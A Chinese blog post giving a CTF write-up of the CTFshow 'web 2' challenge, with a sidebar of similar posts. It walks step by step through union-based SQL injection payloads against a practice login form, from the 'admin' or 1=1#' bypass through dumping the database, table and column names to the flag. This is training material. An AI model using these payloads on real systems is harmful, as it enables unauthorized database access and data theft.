CTFshow web 2 简单的SQL注入

最新推荐文章于 2024-04-30 22:41:15 发布
最新推荐文章于 2024-04-30 22:41:15 发布
阅读量199 收藏
点赞数 1
分类专栏: CTFshow 文章标签: 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43039823/article/details/119039150
版权
"本文详细记录了一次SQL注入攻击的过程,从利用万能密码admin'or1=1#登录,到通过Burp Suite抓包手动注入,逐步揭示了数据库信息。首先确定回显位,接着暴露了数据库名web2,然后爆库表,最后成功获取到flag内容:ctfshow欢迎你,ctfshow{a4f3f9f1-906d-4eff-9b6d-80e4980030d0}
摘要由CSDN通过智能技术生成

打开题目显示是一个简单的登录界面,拿到题目,先试一下万能密码  admin' or 1=1#   123

 

 没有限制的登陆成功,使用burp抓一下包,然后开始下一步。

bp抓包内容如下,发送到RP模块(重发器) 现在开始人工苦比的手动注入

 首先是查看回显位   username=admin' or 1=1 union select 1,2,3#&password=123   GO!

 回显位确认为  2 

下一步,爆库名

 username=admin' or 1=1 union select 1,database(),3#&password=123

库名为   web2   

爆表

 username=admin' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#&password=123

表 有 flag  user

选择 flag 这个 表 读表内容

 username=admin' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#&password=123

爆 flag 内容

 

 得出flag  

 ctfshow欢迎你,ctfshow{a4f3f9f1-906d-4eff-9b6d-80e4980030d0}

 

是Enterprise!
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow--Web2,简单SQL注入
weixin_46637933的博客
02-28 426
SQL注入先找到注入点,然后测试字段:admin' or 1=1 union select 1,2,3 <!-- 该题过滤了空格符,所以用/**/做了绕过 有回显则爆库名:admin' or 1=1 union select 1,database(),3 接着爆库内表:admin' or 1=1 union select 1,group_concat(table_name),3 form information_schema.tables where table_schema='web2'
ctfshow web2|手工注入|sqlmap|getshell练习
spring!
03-26 1970
爆表名 `username=2&password=3' or 1=1 union select 1,(select group_concat( table_name) from information_schema.``TABLES`` where table_schema=database() limit 0,1),3 #` ![image-20220325104245704](https://cdn.jsdelivr.net/gh/r2233r/psBed@main/img/20220326162
Ctfshow——web2简单SQL注入
yu_19980401的博客
09-27 476
Ctfshow——web2 简单SQL注入 万能密码登录 username=admin'+or+1=1#&password=123 出现登录成功的提示 查询列数 username=admin'+or+1=1+order+by+1,2,3#&password=123 3回显正常,4无回显,判断有3列 查询数据库名 username=admin'+or+1=1+union+select+1,database(),3#&password=123 查询数据库内数据表 u
CTF_CTFSHOW入门sql注入_web2
weixin_54227009的博客
05-13 312
打开靶机,用户名和密码顺便输一下 1' union select 1,2,3# 后面#为注释,把后面内容注释掉,因为数据库中构造的sql语句可能后面还有其它内容,或者是字符型注入把前面单引号给闭合掉。我是这样理解的(大佬勿喷) 发现回显点是2,为字符型 注入顺序: 1:查数据库版本version();、查数据库名database(); 2:查表:group_concat(table_name) from information_schema.tables where table_na...
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4376
ctfshow 靶场 web入门 sql注入系列
ctfshow——SQL注入
最新发布
qq_55202378的博客
04-30 1454
前者恒为真,如果and前面的语句有内容,则正常输出;后者恒为假,如果and前面的语句有内容,也不会输出。故,可以通过他们俩来判断SQL注入类型。查看页面源代码,发现一个js文件。访问该文件,会发现一个查询接口。一种方法是抓取数据包,让sqlmap跑数据包;不知道为啥这里%0c没有被过滤。的时候,需要使前面一条语句错误。伪造referer。这一关开始使用sqlmap。进行报错注入的时候,需要对。(+的url编码)替换。指定 sqlmap 以。参数指定要测试的网址,
CTFSHOW web193 left标注盲注脚本
05-04
它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每...
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
CTFSHOW web192 标注盲注脚本
05-04
此脚本尝试通过 SQL 注入获取一个网站的 flag,实现过程是构造不同的 SQL 注入 payload 并发送 POST 请求,如果返回的响应中包含特定字符串,则说明获取到了一个字符,将其添加到 flag 中,最终输出完整的 flag。...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFCTFshow-SQL注入(持续更新)
qq_53099119的博客
06-21 526
CTFshow sql
WEB漏洞——SQL注入之简要SQL注入
qq_52589245的博客
10-06 2991
前言 sql注入是比较常见的网络攻击方式之一, 他不是利用操作系统的bug来实现攻击,而是针对程序员编写时的疏忽,通过sql语句,实现无账号登录,甚至篡改数据库。 sql简介 sql是一门ANSI的标准计算机语言, 用来访问和操作书序库系统。 sql语句用于取回和更新数据库中的数据。sql可与数据库程序协同工作,比如MS Access, DB2 , informinx, mssql Server,Oracle, Sybase 以及其他数据库系统。 sql注入 ...
BUU_web [极客大挑战 2019]BabySQL
qq_46635165的博客
09-28 204
打开解题网址,一个账号密码输入框,根据题目,显然是sql注入: 尝试以 admin ,弱密码登录: 发现是get传参,提示登录错误用户或密码,进行抓包,并尝试单引号报错,找到报错显示位: %23尝试闭合语句,闭合成功: 到这里,有个一点需要注意: 如果用 burpsuite 进行sql注入,那么语句里面包含的空格 或者 # 号需要进行手动url编码再写入payload,因为 burpsuite 上是直接以 url 传参,不会再对数据进行自动url编码;而如果是直接在输入框上做 sql 注入,则不用
CTF-Web-[极客大挑战 2019]BabySQL
归子莫的博客
05-03 1033
CTF-Web-[极客大挑战 2019]BabySQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]BabySQL 打开题目的实例 思路 当然第一步还是尝试万能密...
web23最简单SQL注入
weixin_59453707的博客
08-08 242
打开靶场 首先随便输入adminadmin 没有报错,但是清空了 输入万能密匙1'or1=1# 同样被清空了 题目提示有sql注入,那就使用burp抓包,发送到repeater
[极客大挑战 2019] web题-BabySQL
BROTHERYY的博客
07-08 269
复现环境:buuoj.cn 他又来了,上次被日了,这次还是要被日 发现被过滤了 用双写绕过 获取所有数据库 获取ctf库中所有的表 获取表内字段 获取表内数据 flag{85f76441-5982-4c33-975e-23a8f7365874}
CTFshow(web2-4)
weixin_51706044的博客
05-30 334
文章目录web02web03 web02 进入可以看到表单,很明显这是POST注入,可以利用万能密码进行登录 测试: 登陆成功 回显查看 1' or 1=1 union select 1,2,3# 进行数据库的查询 1'or 1=1 union select 1,database(),3# 查询表 1' or 1=1 union select 1,table_name,3 from information_schema.tables where table_schema='web2'# 查
ctfshow web 1-14
yzl_007的博客
09-30 843
web1-20 web1-20web1web2web3web4web5月饼杯web签到持续更新。。。。。 web1 签到题,打开查看源码,base64解码得到flag web2 题目提示:最简单sql sqlmap一把嗦 详细的使用可以查看这个:https://blog.csdn.net/yzl_007/article/details/119974367 web3 打开是一段代码, <?php include($_GET['url']);?> 文件包含函数,容易造成文件包含漏洞,输入
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值